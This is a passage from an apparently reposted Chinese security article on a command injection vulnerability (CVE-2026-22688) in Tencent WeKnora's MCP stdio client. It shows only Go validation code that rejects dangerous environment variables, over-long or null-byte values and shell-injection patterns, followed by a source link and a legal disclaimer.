&nbsp; &nbsp;&nbsp;for&nbsp;key, value :=&nbsp;range&nbsp;envVars {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Check key against dangerous patterns&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;_, pattern :=&nbsp;range&nbsp;DangerousEnvVarPatterns {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;pattern.MatchString(key) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;fmt.Errorf("environment variable '%s' is not allowed for security reasons", key)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Check key length&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;len(key) >&nbsp;256&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;fmt.Errorf("environment variable name '%s' exceeds maximum length", SanitizeForLog(key[:50]))&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Check value length&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;len(value) >&nbsp;4096&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;fmt.Errorf("environment variable '%s' value exceeds maximum length", key)&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Check for null bytes in value&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;strings.Contains(value,&nbsp;"\x00") {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;fmt.Errorf("environment variable '%s' value contains null bytes", key)&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// Check value for shell injection patterns&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;_, pattern :=&nbsp;range&nbsp;DangerousArgPatterns {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;pattern.MatchString(value) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;fmt.Errorf("environment variable '%s' value contains potentially dangerous pattern", key)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;return&nbsp;nil}
// ValidateStdioConfig performs comprehensive validation of stdio configuration// This should be called before creating or executing any stdio-based MCP clientfunc&nbsp;ValidateStdioConfig(command&nbsp;string, args []string, envVars&nbsp;map[string]string)&nbsp;error&nbsp;{&nbsp; &nbsp;&nbsp;// Validate command&nbsp; &nbsp;&nbsp;if&nbsp;err := ValidateStdioCommand(command); err !=&nbsp;nil&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;fmt.Errorf("invalid command: %w", err)&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;// Validate arguments&nbsp; &nbsp;&nbsp;if&nbsp;err := ValidateStdioArgs(args); err !=&nbsp;nil&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;fmt.Errorf("invalid arguments: %w", err)&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;// Validate environment variables&nbsp; &nbsp;&nbsp;if&nbsp;err := ValidateStdioEnvVars(envVars); err !=&nbsp;nil&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;fmt.Errorf("invalid environment variables: %w", err)&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;return&nbsp;nil

原文链接:https://xz.aliyun.com/news/91166


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:dmd5安全 dmd5安全 dmd5安全《CVE-2026-22688 – 腾讯WeKnora MCP Stdio 命令注入漏洞》

评论:0   参与:  0